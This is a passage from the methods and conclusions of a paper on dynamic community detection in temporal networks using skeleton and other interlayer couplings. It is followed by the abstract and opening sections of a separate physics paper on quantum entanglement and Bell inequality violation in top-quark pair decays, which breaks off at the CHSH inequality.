DCD algorithm can be additionally complicated.
In our parameter space plots of Figs. 5 and 6, we can make a general observation that the value of the interlayer edge weight seems less important than the value of the threshold parameter, as seen by the similar color value of the NMI that extends vertically throughout the plots. In fact, when comparing Figs. 5A and B using the MMM algorithm, it is clear that the optimal threshold parameter is highly dependent on the type of community event for the diagonal coupling schemes. This effect is much less pronounced for the non-diagonal coupling schemes. We again see a similar effect when looking at the performance of Infomap in Fig. 6. Here, for diagonal coupling schemes, we again see differences in the regions of optimal parameters between panels A and B. Interestingly, there is also more dependence on the choice of edge weight for diagonal coupling schemes used with Infomap. Further, when employing non-diagonal coupling schemes (neighborhood and skeleton), the optimal regions in Figs. 5 and 6 exhibit a much stronger NMI which extends along the entire parameter space (vertically) for both expanding and transient community events, and this observation is independent of the choice of DCD algorithm. This finding suggests that non-diagonal linking schemes such as skeleton coupling can be used as a dimensionality reduction technique since the choice of optimal parameters is less dependent on the interlayer coupling edge weight, \(\omega\), type of community event, and choice of algorithm. While non-diagonal coupling schemes show many advantages, one drawback of skeleton coupling is the computational cost of the given framework. In order to take advantage of skeleton coupling, one needs to apply static community detection to individual snapshots, as skeleton coupling utilizes the static community information in order to determine interlayer edges. This means that the static version of the DCD algorithm needs to run multiple times before running the DCD algorithm on the full temporal network, which clearly increases the computational complexity. However, on short-stacked temporal networks (low number of snapshots), the time consumption of the algorithm is not problematic given that the accuracy of the DCD algorithm is drastically improved. Finally, we note that the same idea of skeleton coupling can be extended further to higher-order skeletons. For example, a community of size 2 is also topologically different than a community of size 3 or more, as the size 2 community can at most have a 1-skeleton, whereas the larger community can have at least a 2-skeleton, which corresponds to the filled-in triangles in the corresponding simplicial complex. In general, community sizes and dimensions of the associated skeletons are correlated and a community of size \(k\) can have at most a \((k-1)\)-skeleton, which distinguishes it from larger size communities. Within our presented framework, additionally utilizing higher-order skeletons to select interlayer edges would result in the addition of subcases of the _'case iv'_ section of the presented algorithm. We anticipate that incorporating higher-order skeletons would improve the performance of DCD algorithms by introducing greater differences in topological coupling between layers. However, here, we only focus on skeletons up to dimension 1 due to the previously discussed computational concerns. In summary, this work fills an important gap in the literature by comparing and contrasting various DCD algorithms and their optimal hyperparameters for performing community detection in temporal networks.
In real-world data where the ground truth community structure and evolution is not known, understanding how network construction and choice of DCD algorithm affects the outcome of the detected community evolution is essential. In data sets with expected singleton and transient communities, we therefore recommend the use of non-diagonal coupling strategies such as skeleton coupling to improve algorithm performance and provide a more accurate representation of community evolution.

## VIII Methods

### Code and Data availability

Code for the implementation of skeleton coupling can be found at [40] and an accompanying documentation for this codebase can be found at [41].

### DCD algorithms

#### iii.2.1 Multilayer modularity maximization (MMM)

Modularity assesses partition quality based on a comparison between the connectivity of nodes within a community and between communities, relative to what would be expected in a null model [17]. In our case, communities within layers are compared to the configuration model [42] by utilizing the Leiden solver [43] (instead of the commonly used Louvain algorithm [44]). In Fig. 2, we explored algorithm performance as a function of the edge threshold and resolution parameter, \((T,\gamma)\). For this analysis, all calculations were performed assuming uniform diagonal coupling with interlayer edge weight \(\omega=0.1\). For the analysis in Fig. 5, we selected the optimal resolution parameter found from the analysis done in Fig. 2 (Fig. 5A, \(\gamma=0.94\); Fig. 5B, \(\gamma=1.46\)) and fixed this parameter in order to explore the \((T,\omega)\) parameter space for different interlayer coupling configurations.

#### iii.2.2 Infomap

Infomap determines community structure based on the visiting times of nodes by random walkers via the map equation [35; 18]. We used the python API [19] with a directed flow model and optimized a two-level partition in order to run our analyses. We explored algorithm performance as a function of the edge threshold and multilayer relax rate, \((T,\rho)\). For this analysis, all calculations were performed assuming uniform diagonal coupling with interlayer edge weight \(\omega=0.1\). For the analysis in Fig. 6, we selected the optimal multilayer relax rate found from the analysis done in Fig. 2 (Fig. 6A and B, \(\rho=0.2\)) and fixed this parameter in order to explore the \((T,\omega)\) parameter space for different interlayer coupling configurations.

#### iii.2.3 Dynamic stochastic block model (DSBM)

Stochastic block models determine community structure by trying to fit generative models to known properties of the data [20; 21]. In our experiments, we utilized _LayeredBlockState_ in the graph-tool API [45] with the overlapping model and edge covariates chosen as 'real-exponential' [20]. We ran our analyses with and without degree correction \(\Delta\) (1 and 0, respectively), which we included in \((T,\Delta)\) parameter spaces as two different rows in Fig. 2.

#### iii.2.4 Dynamic plex propagation method (DPPM)

The dynamic plex propagation method is a generalization of the clique percolation method (CPM) [46]. DPPM relaxes the condition on the definitions of communities, which were \(n\)-cliques in CPM, into \(k\)-plexes on \(n\) nodes [22]. The algorithm runs on individual layers of the network to find the topologically clustered plexes used to define static communities. These community labels are then separately carried over across snapshots for mapping and matching.
We used \(n=k+2\) in our analyses for \(k=2,3\) as indicated in the rows of the \((T,k)\) parameter space shown in Fig. 2. We additionally note that one major drawback of the algorithm is its computational complexity, which limited the use of this algorithm in our experiments.

#### iii.2.5 Tensor Factorization

Tensor factorization determines community structure by approximating the bases of a vector space corresponding to the temporal network. The algorithm takes the desired number of communities, \(\eta\), as input; however, this quantity is usually not known in real-world data [23]. We therefore explore the \((T,\eta)\) parameter spaces in Fig. 2. We used a random initialization of the factorization of the tensors with 500 iterations. We averaged the first two factors (x- and y-dimensions of the tensors) and multiplied the result by the third dimension (time axis) of the basis elements in order to obtain community labels.

### Synthetic Data Generation

We simulated neuronal activity of a population of \(N=78\) synthetic neurons using a homogeneous Poisson process. Similarity between firing patterns of neurons was assessed using the pairwise maximum cross-correlation between neurons, meaning that the goal of performing DCD on this data set was to detect groups of neurons with similar firing patterns. To create a temporal network from the time-series data in our experiments, we used a window size of \(\tau=1000\) ms and \(t_{max}=6\) to create snapshots (layers) of the network. In order to simulate monotonically growing communities, a master spike train of length \(t_{max}\times\tau\) was generated with a randomly selected spike rate and jittered \(\pm 5\) ms to create the master community. The size of the master community was randomly selected from different distributions (uniform, gaussian or exponential) in order to ensure robust results. Next, at every \(1000\) ms, we generated independent spike trains of a given size (from the same distribution as the master) that synchronized their spiking activity with the master community (again by jittering the master spike train). This process led to singleton communities joining the master community at every time window. For non-monotonic events, we input the number of communities we desired at each snapshot into our time-series generating pipeline. Within each layer, we created master spike trains that were jittered to generate the associated community. Then we 'spaced' these communities by generating independently firing spike trains. As a result, in each layer, we had \(N\) neurons where some were distributed into communities and some were singletons. If communities in adjacent layers intersected more than \(50\%\), we assigned them the same dynamic community label. After generating time series for both monotonic and non-monotonic community events, we divided the time series into windows of length \(\tau=1000\). We computed the pairwise maximum cross-correlation in each window to build snapshot representations of temporal networks that represent the underlying planted community structure. Finally, before applying any DCD algorithms, we padded the first and the last layers of every snapshot by the first and last static snapshot to avoid end point issues. Note that the community partitions in the padded layers were discarded after the algorithm was run.

### Interlayer coupling

#### v.4.1 Uniform diagonal coupling

Uniform diagonal coupling was performed by adding undirected interlayer links between a node and itself in adjacent snapshots, i.e.
for every node \(\sigma_{\alpha}^{t}\in V\) where \(t\in\{1,2,..,t_{max}-1\}\), we assign an interlayer edge of constant weight \(\omega\), \((\sigma_{\alpha}^{t},\sigma_{\alpha}^{t+1})\).

#### v.4.2 Diagonal coupling with local updates

Diagonal coupling with local updates is topologically the same heuristic as diagonal coupling, but in this case, the interlayer edge weights \(\omega_{\alpha}\) are allowed to vary. Given a constant edge weight \(\omega\), \(\omega_{\alpha}\) is equal to \(\omega\cdot s\) if the change in the nodal attribute between layers \(\mathsf{G}_{t}\) and \(\mathsf{G}_{t+1}\) is less than (or equal to) \(y\) standard deviations, and is equal to \(\omega\) if it is greater than \(y\) standard deviations, as described in [38]. We use firing rate as our nodal attribute and take \(s=\frac{1}{100}\) and \(y=0.5\) in our experiments.

#### v.4.3 Neighborhood coupling

For neighborhood coupling, we determine a neighborhood of a node \(\sigma_{\alpha}^{t}\) where \(t\in\{1,2,..,t_{max}-1\}\) based on the strength of intralayer edges of \(\sigma_{\alpha}^{t}\). We sort all the neighbors of \(\sigma_{\alpha}^{t}\), \(\mathsf{N}_{\alpha}^{t}\), in descending order of connection strength and take only the first \(p\%\) of these neighbors \(\{\sigma_{\beta}^{t+1}\}_{\beta\in\mathsf{N}_{\alpha}^{t}}\) as the set of maximal neighbors, which we couple with \(\sigma_{\alpha}^{t}\) by assigning uniform edge weights \(\omega\), where \(p=10\). We followed a similar protocol as described in [39] for normalizing the weights of outlinks and using Jensen-Shannon divergence, but we only couple nodes that are in adjacent snapshots.

### Optimal regions

We determine the optimal regions of algorithm parameters by taking the argmax of the normalized mutual information (NMI) within the parameter planes, \((T,\cdot)\). The corresponding _example partitions_ are then shown for this parameter set. Although the same maximum value can occur at multiple \((T,\cdot)\) pairs, we only display one example partition since different maximal example partitions generally do not differ structurally. In Figs. 5 and 6, we choose the non-optimal regions by keeping the interlayer edge weight, \(\omega\), the same and varying the intralayer edge threshold, \(T\).

### Evaluating partition quality

We compare the performance of dynamic community detection algorithms with respect to a ground truth which we consider to be our planted community labels. Note that because different DCD algorithms use different definitions of the optimal community, we expect that different algorithms will detect different community partitions. Additionally, when applying DCD algorithms to real-world data, there is no known ground truth for comparison [47], which is why we explore synthetic data sets with different planted community evolution. Importantly, however, when exploring different interlayer coupling strategies, we are making comparisons about algorithm performance within a single DCD algorithm, meaning that we are gaining quantifiable insights about differences in algorithm performance as a function of interlayer coupling independently of the quality function used by the algorithm.
We measure the similarity between true community labels \(U\) and predicted community labels \(V\) by calculating the _normalized mutual information_ (NMI) [36; 37]: \[NMI(U,V)=\frac{I(U,V)}{\max(H(U),H(V))} \tag{1}\] where \(H(\cdot)\) is the entropy and \(I(\cdot,\cdot)\) is the mutual information, which we choose to normalize by the maximum entropy of the labels since this approach works better with overlapping communities [48]. In addition, we illustrate the results in which we measure the quality of the partition by other metrics (ARI, NVI and Jaccard index) in Supplementary Material 'Partition quality metrics'.

## IX Acknowledgment

This work was supported by the National Science Foundation (SMA-1734795 to S.F.M.).
2310.17696
Quantum Entanglement and Bell Inequality Violation in Semi-Leptonic Top Decays
Quantum entanglement is a fundamental property of quantum mechanics. Recently, studies have explored entanglement in the $t\bar{t}$ system at the Large Hadron Collider (LHC) when both the top quark and anti-top quark decay leptonically. Entanglement is detected via correlations between the polarizations of the top and anti-top and these polarizations are measured through the angles of the decay products of the top and anti-top. In this work, we propose searching for evidence of quantum entanglement in the semi-leptonic decay channel where the final state includes one lepton, one neutrino, two $b$-flavor tagged jets, and two light jets from the $W$ decay. We find that this channel is both easier to reconstruct and has a larger effective quantity of data than the fully leptonic channel. As a result, the semi-leptonic channel is $60\%$ more sensitive to quantum entanglement and a factor of 3 more sensitive to Bell inequality violation, compared to the leptonic channel. In $139~{\rm fb}^{-1}$ ($3~{\rm ab}^{-1}$) of data at the LHC (HL-LHC), it should be feasible to measure entanglement at a precision of $\lesssim 3\%\ (0.7\%)$. Detecting Bell inequality violation, on the other hand, is more challenging. With $300~{\rm fb}^{-1}$ ($3~{\rm ab}^{-1}$) of integrated luminosity at the LHC Run-3 (HL-LHC), we expect a sensitivity of $1.3\sigma$ ($4.1 \sigma$). In our study, we utilize a realistic parametric fitting procedure to optimally recover the true angular distributions from detector effects. Compared to unfolding this procedure yields more stable results.
Tao Han, Matthew Low, Tong Arthur Wu
2023-10-26T18:00:02Z
http://arxiv.org/abs/2310.17696v1
# Quantum Entanglement and Bell Inequality Violation in Semi-Leptonic Top Decays

###### Abstract

Quantum entanglement is a fundamental property of quantum mechanics. Recently, studies have explored entanglement in the \(t\bar{t}\) system at the Large Hadron Collider (LHC) when both the top quark and anti-top quark decay leptonically. Entanglement is detected via correlations between the polarizations of the top and anti-top and these polarizations are measured through the angles of the decay products of the top and anti-top. In this work, we propose searching for evidence of quantum entanglement in the semi-leptonic decay channel where the final state includes one lepton, one neutrino, two \(b\)-flavor tagged jets, and two light jets from the \(W\) decay. We find that this channel is both easier to reconstruct and has a larger effective quantity of data than the fully leptonic channel. As a result, the semi-leptonic channel is 60% more sensitive to quantum entanglement and a factor of 3 more sensitive to Bell inequality violation, compared to the leptonic channel. In 139 fb\({}^{-1}\) (3 ab\({}^{-1}\)) of data at the LHC (HL-LHC), it should be feasible to measure entanglement at a precision of \(\lesssim 3\%\) (0.7%). Detecting Bell inequality violation, on the other hand, is more challenging. With 300 fb\({}^{-1}\) (3 ab\({}^{-1}\)) of integrated luminosity at the LHC Run-3 (HL-LHC), we expect a sensitivity of 1.3\(\sigma\) (4.1\(\sigma\)). In our study, we utilize a realistic parametric fitting procedure to optimally recover the true angular distributions from detector effects. Compared to unfolding this procedure yields more stable results.

**Contents:** 1 Introduction; 2 Quantum Mechanics (2.1 Review, 2.2 Entanglement, 2.3 Bell Inequality Violation); 3 The Top-Antitop System at Hadron Colliders (3.1 Two-Body Production at Hadron Colliders, 3.2 The \(t\bar{t}\) System as a Quantum State, 3.3 Spin Analyzing Power, 3.4 Entanglement in \(t\bar{t}\), 3.5 Bell Inequality Violation in \(t\bar{t}\)); 4 Results at the LHC (4.1 Sketch of Expected Results, 4.2 Simulation, 4.3 Unfolding and Parametric Fitting, 4.4 Signal Regions, 4.5 Entanglement Results, 4.6 Bell Inequality Violation Results); 5 Summary and Conclusions; Appendix A Unfolding and Parametric Fitting (A.1 Unfolding, A.2 Parametric Fitting); Appendix B Comparison to Previous Results; Appendix C Spin Analyzing Power for Hadronic Top Decays; Appendix D Quantum versus Fictitious States; Appendix E Charm Tagging.

## 1 Introduction

Quantum mechanics is at the foundation of modern physics. One of the novel features of a quantum mechanical system is that it can exhibit entanglement between sub-systems. Entanglement is a correlation between sub-systems where properly describing one sub-system requires knowledge of the other sub-system, even when the sub-systems are space-like separated. Another landmark in the understanding of quantum mechanics was the discovery of Bell inequalities [1]. These are inequalities that are satisfied in any classical theory or, more generally, in any local theory that can include hidden variables. Violations of Bell inequalities, so-called Bell non-localities, indicate that a local classical theory cannot be used to describe these phenomena. Observations of violations of Bell inequalities are among the strongest experimental evidence for quantum mechanics. High energy particle colliders fundamentally rely on quantum field theory for their quantitative description and aspects of quantum mechanics are observable throughout the theoretical and experimental landscape.
For instance, interference effects in production cross sections and detection methods for particles rely on quantum mechanics, while precision physics depends on higher-order quantum corrections from all relevant energy scales. In recent work, the final state in a collider is cast as a system of two qubits, which allows us to perform a number of experiments using this system. Treating the outgoing particles at a collider as a quantum state is a novel experiment that measures and tests quantum mechanics in an unprecedented high-energy regime, many orders of magnitude in energy above conventional quantum experiments. Adapting to the collider environment presents interesting challenges as there is much less control over the experimental set-up. On the other hand, at a collider there is an enormous amount of data collected, a wide range of kinematics and energies are explored, and effects that are enhanced at higher energies, like higher dimensional operators, may be visible [2; 3]. Recently, there has been a growing body of work on the \(t\bar{t}\) system as a quantum state. First, it was shown that in the fully leptonic channel, where both the top and the anti-top decay leptonically, entanglement could be measured at the Large Hadron Collider (LHC) when only events near threshold are used [4]. Initially, it was predicted that Bell inequality violation, using the same spin correlation observables, could be probed at the high luminosity LHC (HL-LHC) [5]. However, subsequent studies found the expected significance to be less than \(2\sigma\) when unbiased observables are used [6]. Ref. [7] noted that one could use expectation values of spin correlations rather than spin correlations themselves to identify entanglement and Bell inequality violation. Additional significance may be gained by directly measuring an observable sensitive to Bell inequality violation, rather than first reconstructing the quantum state and then computing observables from it [8]. Beyond Bell inequality violation, other quantum properties can be studied in the \(t\bar{t}\) system, like quantum steering and quantum discord [9]. The issue of spin correlations at colliders is a well-studied topic. The \(t\bar{t}\) system, in particular, has been studied since before the LHC era [10; 11; 12; 13; 14; 15]. What is new in the current iteration of work is carefully casting the \(t\bar{t}\) system into a quantum state rather than just correlations between two spins. This allows us to make quantitative statements about the quantum aspects of the \(t\bar{t}\) system. In this work, we continue the study of the \(t\bar{t}\) final state, but instead of studying the leptonic channel, we consider the semi-leptonic channel where either the top or anti-top decays leptonically and the other decays to a light quark and anti-quark. One of the nice features of the top (or anti-top) decaying leptonically is that the lepton (or anti-lepton) carries the maximal amount of information about the top polarization. In hadronic decays, some of that information is typically lost. On the other hand, the branching fraction to the semi-leptonic channel is much higher, roughly a factor of six, so the effective amount of data collected is larger. Combined with the more favorable kinematical reconstruction, we find that the semi-leptonic channel is expected to be more sensitive. While finalizing this work, Ref. [16] presented a study on the semi-leptonic decay of \(t\bar{t}\) using unfolding and machine learning for reconstruction.
Our work is complementary as we show that choosing an appropriate signal region is impactful and we focus on providing intuition through each stage as well as the theoretical underpinnings. Instead of unfolding, we utilize parametric fitting. In addition to the \(t\bar{t}\) system, there have been studies on quantum properties of other systems at colliders. These include entanglement between two vectors [17; 18; 19; 20] including production from \(h\to VV\) [21; 22; 23; 24; 25; 26] and vector boson fusion [27], between \(W\) and \(t\) [28], between \(\tau^{+}\) and \(\tau^{-}\) [29; 30], between \(B\)-mesons [31], and others [32]. Implications for higher dimensional operators have been explored [2; 3], as have other quantum properties like discord and steering [9].1 Footnote 1: This was also studied in the 1990's for \(e^{+}e^{-}\to\tau^{+}\tau^{-}\) [33; 34; 35]. In Sec. 2.3 we reconcile these past works with our work. The rest of the paper is organized as follows. In Sec. 2, we review the basics of quantum mechanics with an emphasis on entanglement and Bell inequality violation. We discuss the general features and the quantum mechanical aspects of the \(t\bar{t}\) system for production and decay at hadron colliders in Sec. 3. The results of our analysis on the sensitivity to test entanglement and Bell inequality violation in the \(t\bar{t}\) system at the LHC are presented in Sec. 4. In Sec. 5, we summarize our study, compare with the existing literature, and draw our conclusions. Some technical aspects of our treatment are included in a few appendices, including a description of different unfolding methods and parametric fitting in Appendix A, numerical comparisons with past works in Appendix B, a presentation of the spin analyzing power for hadronic top decays in Appendix C, and a discussion on the fictitious states adopted for detecting entanglement and Bell inequality violation at colliders in Appendix D. Finally, the potential of charm tagging is covered in Appendix E.

## 2 Quantum Mechanics

In this section we first review a few relevant aspects of quantum mechanics, then we discuss entanglement and Bell inequalities.

### Review

Consider a bipartite system of two qubits. There is one qubit \(|\psi_{\mathcal{A}}\rangle\) from sub-system \(\mathcal{A}\) and one qubit \(|\psi_{\mathcal{B}}\rangle\) from sub-system \(\mathcal{B}\). These states are vectors in the Hilbert spaces \(\mathcal{H}_{\mathcal{A}}\) and \(\mathcal{H}_{\mathcal{B}}\), respectively. The bipartite state is a vector in the Hilbert space \(\mathcal{H}_{\mathcal{A}}\otimes\mathcal{H}_{\mathcal{B}}\). A density matrix \(\rho\) is a non-negative operator on Hilbert space. For a state vector \(|\psi\rangle\), the associated density matrix is the projection operator \(\rho=|\psi\rangle\langle\psi|\). We will often call \(\rho\) itself a quantum state associated with the state vector \(|\psi\rangle\). After choosing a basis, \(\rho\) for a bipartite qubit state can be written as a \(4\times 4\) positive semi-definite matrix. The density matrix formalism is required because it allows us to describe mixed states where state vectors restrict us to pure states. A mixed state is generically written as \[\rho_{\rm mixed}=\sum_{a=1}^{N}p_{a}\rho_{a},\qquad\quad\sum_{a=1}^{N}p_{a}=1, \tag{1}\] where \(p_{a}\) is the fraction of the ensemble for the sub-state \(a\). The case of \(N=1\) is a pure state; otherwise, it is a mixed state. In our application to the \(t\bar{t}\) system, we will be dealing with a mixed state.
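As a quick numerical illustration of the pure/mixed distinction (our own toy example, not from the paper), the snippet below builds the density matrix of a pure two-qubit state and of a two-term mixture, and checks unit trace, positive semi-definiteness, and the standard purity diagnostic \(\mathrm{tr}(\rho^{2})\), which equals one only for a pure state.

```python
import numpy as np

ket0 = np.array([1.0, 0.0])
ket1 = np.array([0.0, 1.0])

def dm(psi):
    """Density matrix |psi><psi| of a (normalized) state vector."""
    psi = psi / np.linalg.norm(psi)
    return np.outer(psi, psi.conj())

# pure state: the Bell state (|01> - |10>)/sqrt(2)
bell = (np.kron(ket0, ket1) - np.kron(ket1, ket0)) / np.sqrt(2)
rho_pure = dm(bell)

# mixed state: equal ensemble of the product states |01> and |10>
rho_mixed = 0.5 * dm(np.kron(ket0, ket1)) + 0.5 * dm(np.kron(ket1, ket0))

for name, rho in [("pure", rho_pure), ("mixed", rho_mixed)]:
    evals = np.linalg.eigvalsh(rho)
    print(name,
          "trace =", np.trace(rho).real.round(3),
          "min eigenvalue =", evals.min().round(3),
          "purity tr(rho^2) =", np.trace(rho @ rho).real.round(3))
# expected: purity 1.0 for the pure state, 0.5 for the mixed state
```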
For a single qubit, the density matrix can be described by the Pauli decomposition \[\rho=\frac{1}{2}\Big{(}\mathbb{I}_{2}+\sum_{i}B_{i}\sigma_{i}\Big{)}, \tag{2}\] where \(\sigma_{i}\) (\(i=1,2,3\)) are the Pauli matrices and \(B_{i}\) are the corresponding vector components describing the net polarization of the qubit. A bipartite qubit system follows the Pauli decomposition in a similar way \[\rho=\frac{1}{4}\Big{(}\mathbb{I}_{4}+\sum_{i}\big{(}B_{i}^{\mathcal{A}}\;( \sigma_{i}\otimes\mathbb{I}_{2})+B_{i}^{\mathcal{B}}\;(\mathbb{I}_{2}\otimes \sigma_{i})\big{)}+\sum_{i,j}C_{ij}\;(\sigma_{i}\otimes\sigma_{j})\Big{)}. \tag{3}\] For a general state, there are \(3+3+9=15\) degrees of freedom from the vectors \(B_{i}^{\mathcal{A}}\) and \(B_{i}^{\mathcal{B}}\), and the matrix \(C_{ij}\). The \(B_{i}^{\mathcal{A}}\) vector is the net polarization of spin \(\mathcal{A}\), the \(B_{i}^{\mathcal{B}}\) vector is the net polarization of spin \(\mathcal{B}\), and \(C_{ij}\) is the spin correlation matrix between sub-systems \(\mathcal{A}\) and \(\mathcal{B}\). In many cases of interest, some of these parameters are zero by symmetry. Determining all the parameters \(\{B_{i}^{\mathcal{A}},B_{j}^{\mathcal{B}},C_{ij}\}\) implies that \(\rho\) can be reconstructed, which is known as quantum tomography. Once the quantum state \(\rho\) has been measured, the expectation value of any observable \(\mathcal{O}\) can be computed as \[\langle\mathcal{O}\rangle=\mathrm{tr}(\mathcal{O}\rho). \tag{4}\] For instance, the net polarization of qubit \(\mathcal{A}\) corresponds to the operator \(\mathcal{O}=\sigma_{i}\otimes\mathbb{I}_{2}\). By Eqs. (3) and (4), this is \(\langle\sigma_{i}\otimes\mathbb{I}_{2}\rangle=B_{i}^{\mathcal{A}}\). ### Entanglement Consider a state \(\rho\) for a bipartite system with sub-systems \(\mathcal{A}\) and \(\mathcal{B}\). This state is separable if it can be written as a factorized product \[\rho=\sum_{a=1}^{N}p_{a}\ \rho_{a}^{\mathcal{A}}\otimes\rho_{a}^{\mathcal{B}}. \tag{5}\] If it cannot be written in this separable factorized form, it is entangled. This means that sub-system \(\mathcal{A}\) cannot be fully described without knowledge of sub-system \(\mathcal{B}\). For a pure state, \(N=1\) and \(p_{1}=1\). Given a state \(\rho\) there are different ways to determine if \(\rho\) describes an entangled or a separable state. We choose to use the Peres-Horodecki criterion, also called the positive partial transpose (PPT) criterion [36; 37]. The PPT criterion performs the transpose on sub-system \(\mathcal{B}\) and leaves sub-system \(\mathcal{A}\) unmodified leading to a matrix \(\rho^{T_{\mathcal{B}}}\) where \[\rho^{T_{\mathcal{B}}}=(\mathbb{I}_{2}\otimes T_{\mathcal{B}})\rho. \tag{6}\] The matrix \(\rho^{T_{\mathcal{B}}}\) may or may not be a state. For a separable, unentangled state \(\rho_{\mathrm{sep}}\), the associated \(\rho_{\mathrm{sep}}^{T_{\mathcal{B}}}\) can be written as \(\sum_{a}p_{a}\ \rho_{a}^{\mathcal{A}}\otimes(\rho_{a}^{\mathcal{B}})^{T}\), which corresponds to a valid state. For an entangled state \(\rho_{\mathrm{ent}}\), however, the associated \(\rho_{\mathrm{ent}}^{T_{\mathcal{B}}}\) is no longer a state. In general, a matrix is a valid state if all of its eigenvalues are \(\geq 0\), or equivalently stated, the matrix is positive semi-definite. The PPT criterion leads to a list of inequalities, the violation of any of these inequalities is a sufficient, but not necessary condition for entanglement. 
Thus, using the PPT criterion to show entanglement requires just finding a single inequality that isn't satisfied, while showing separability requires checking a set of inequalities. Concretely, expanding a quantum state \(\rho\) according to Eq. (3) allows us to write the conditions in terms of elements of the spin correlation matrix \(C_{ij}\). The quantum state \(\rho\) is \[\rho=\frac{1}{4}\left(\begin{array}{cccc}1+B_{3}^{\mathcal{A}}+B_{3}^{\mathcal{B}}+C_{33}&B_{1}^{\mathcal{B}}+C_{31}-i(B_{2}^{\mathcal{B}}+C_{32})&B_{1}^{\mathcal{A}}+C_{13}-i(B_{2}^{\mathcal{A}}+C_{23})&C_{11}-C_{22}-i(C_{12}+C_{21})\\ B_{1}^{\mathcal{B}}+C_{31}+i(B_{2}^{\mathcal{B}}+C_{32})&1+B_{3}^{\mathcal{A}}-B_{3}^{\mathcal{B}}-C_{33}&C_{11}+C_{22}+i(C_{12}-C_{21})&B_{1}^{\mathcal{A}}-C_{13}-i(B_{2}^{\mathcal{A}}-C_{23})\\ B_{1}^{\mathcal{A}}+C_{13}+i(B_{2}^{\mathcal{A}}+C_{23})&C_{11}+C_{22}-i(C_{12}-C_{21})&1-B_{3}^{\mathcal{A}}+B_{3}^{\mathcal{B}}-C_{33}&B_{1}^{\mathcal{B}}-C_{31}-i(B_{2}^{\mathcal{B}}-C_{32})\\ C_{11}-C_{22}+i(C_{12}+C_{21})&B_{1}^{\mathcal{A}}-C_{13}+i(B_{2}^{\mathcal{A}}-C_{23})&B_{1}^{\mathcal{B}}-C_{31}+i(B_{2}^{\mathcal{B}}-C_{32})&1-B_{3}^{\mathcal{A}}-B_{3}^{\mathcal{B}}+C_{33}\end{array}\right), \tag{7}\] and the matrix \(\rho^{T_{\mathcal{B}}}\) is \[\rho^{T_{\mathcal{B}}}=\frac{1}{4}\left(\begin{array}{cccc}1+B_{3}^{\mathcal{A}}+B_{3}^{\mathcal{B}}+C_{33}&B_{1}^{\mathcal{B}}+C_{31}+i(B_{2}^{\mathcal{B}}+C_{32})&B_{1}^{\mathcal{A}}+C_{13}-i(B_{2}^{\mathcal{A}}+C_{23})&C_{11}+C_{22}+i(C_{12}-C_{21})\\ B_{1}^{\mathcal{B}}+C_{31}-i(B_{2}^{\mathcal{B}}+C_{32})&1+B_{3}^{\mathcal{A}}-B_{3}^{\mathcal{B}}-C_{33}&C_{11}-C_{22}-i(C_{12}+C_{21})&B_{1}^{\mathcal{A}}-C_{13}-i(B_{2}^{\mathcal{A}}-C_{23})\\ B_{1}^{\mathcal{A}}+C_{13}+i(B_{2}^{\mathcal{A}}+C_{23})&C_{11}-C_{22}+i(C_{12}+C_{21})&1-B_{3}^{\mathcal{A}}+B_{3}^{\mathcal{B}}-C_{33}&B_{1}^{\mathcal{B}}-C_{31}+i(B_{2}^{\mathcal{B}}-C_{32})\\ C_{11}+C_{22}-i(C_{12}-C_{21})&B_{1}^{\mathcal{A}}-C_{13}+i(B_{2}^{\mathcal{A}}-C_{23})&B_{1}^{\mathcal{B}}-C_{31}-i(B_{2}^{\mathcal{B}}-C_{32})&1-B_{3}^{\mathcal{A}}-B_{3}^{\mathcal{B}}+C_{33}\end{array}\right). \tag{8}\] One example of a sufficient condition for entanglement can be derived from deleting the \(2^{nd}\) and \(3^{rd}\) rows and columns of this matrix [4], leading to \[|C_{11}+C_{22}|>1+C_{33}. \tag{9}\] Whether \((C_{11}+C_{22})\) is positive or negative leads to two separate cases of \(C_{11}+C_{22}>1+C_{33}\) and \(-C_{11}-C_{22}>1+C_{33}\). Rearranging these inequalities we write \(O_{E}^{\pm}=\pm C_{11}\pm C_{22}-C_{33}-1\) where \(O_{E}^{\pm}>0\) indicates entanglement. It will be shown in Sec. 3.1 that the quantity \(O_{E}^{\pm}\) corresponds to an observable \({\cal O}_{E}^{\pm}\) such that testing entanglement at a collider becomes \[{\cal O}_{E}^{\pm}=\pm C_{11}\pm C_{22}-C_{33}-1,\qquad\text{and}\qquad\langle{\cal O}_{E}^{\pm}\rangle>0\quad\text{for entanglement}. \tag{10}\] In pre-defined regions, the observable \({\cal O}_{E}^{\pm}\) corresponds to whether the quantum state \(\rho\) is entangled or separable. It is also customary to introduce a quantity called the "concurrence" \({\cal C}\) [38], which is defined for bipartite qubit systems as \[{\cal C}(\rho)=\max(0,\lambda_{1}-\lambda_{2}-\lambda_{3}-\lambda_{4}), \tag{11}\] where \(\lambda_{i}\) (\(i=1,2,3,4\)) are the eigenvalues, sorted by decreasing magnitude, of the matrix \[R_{\rho}=\sqrt{\sqrt{\rho}\tilde{\rho}\sqrt{\rho}},\qquad\quad\tilde{\rho}=(\sigma_{2}\otimes\sigma_{2})\rho^{*}(\sigma_{2}\otimes\sigma_{2}). \tag{12}\] For a separable state \(\rho_{\rm sep}\), the concurrence is \({\cal C}(\rho_{\rm sep})=0\), while for an entangled state \(\rho_{\rm ent}\) the concurrence is \(0<{\cal C}(\rho_{\rm ent})\leq 1\).2 Footnote 2: For intuition, consider the simplified case when \(\rho\) is a pure state.
The concurrence \({\cal C}\) can be written as \(\text{tr}(\rho_{A}^{2})=1-{\cal C}^{2}/2\) where \(\rho_{A}\) is the reduced density matrix obtained by taking the partial trace with respect to sub-system \({\cal B}\) of \(\rho\). The concurrence then measures how far the reduced density matrix is from a pure state. Generalizing this to mixed states leads to Eq. (11). Therefore one method of identifying entanglement is to first fully determine \(\rho\), and then compute \({\cal C}(\rho)\) to be zero or not. It can be shown that in the \(t\bar{t}\) system Eq. (10) is equal to the concurrence. ### Bell Inequality Violation By construction, a Bell inequality holds for any system that can be described by a local hidden variable theory [1]. Bell inequality violation indicates that a given theory must be either classically non-local, or quantum-mechanically entangled. This historically was very strong evidence for quantum mechanics. A separable state always satisfies Bell's inequality, while an entangled quantum state may or may not violate a Bell inequality. Therefore, Bell inequality violation is a stricter test of "quantumness" than entanglement. For a bipartite system of two qubits, the only Bell inequality is the CHSH inequality (Clauser-Horne-Shimony-Holt) [39], which reads \[\langle A_{1}B_{1}\rangle-\langle A_{1}B_{2}\rangle+\langle A_{2}B_{1}\rangle +\langle A_{2}B_{2}\rangle\leq 2. \tag{13}\] The first term is a simultaneous measurement \(A_{1}\) on sub-system \({\cal A}\) and \(B_{1}\) on 